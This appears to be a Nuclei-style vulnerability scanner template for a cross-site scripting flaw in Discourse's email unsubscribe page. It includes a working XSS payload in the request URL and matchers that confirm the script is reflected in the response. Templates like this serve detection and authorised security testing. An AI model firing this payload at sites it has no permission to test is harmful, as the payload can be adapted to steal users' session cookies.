id: discourse-xss

info:
  name: Discourse - Cross-Site Scripting
  author: madrobot
  severity: high
  description: Discourse contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.cvedetails.com/vulnerability-list/vendor_id-20185/product_id-57316/opxss-1/Discourse-Discourse.html
    - https://github.com/discourse/discourse/security/advisories/GHSA-xhmc-9jwm-wqph
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,discourse

http:
  - method: GET
    path:
      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<svg/onload=alert(/xss/)>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header

# digest: 4a0a0047304502205a42f4d8dc3a8af68c184c70096073821184ac47b7a191c6eeb981bace67a7e4022100eff574a1238ca7e44f29a1a04148ff7bcda9d632cbb3d043a8918d9b70195a5b:922c64590222798bb761d5b6d8e72950
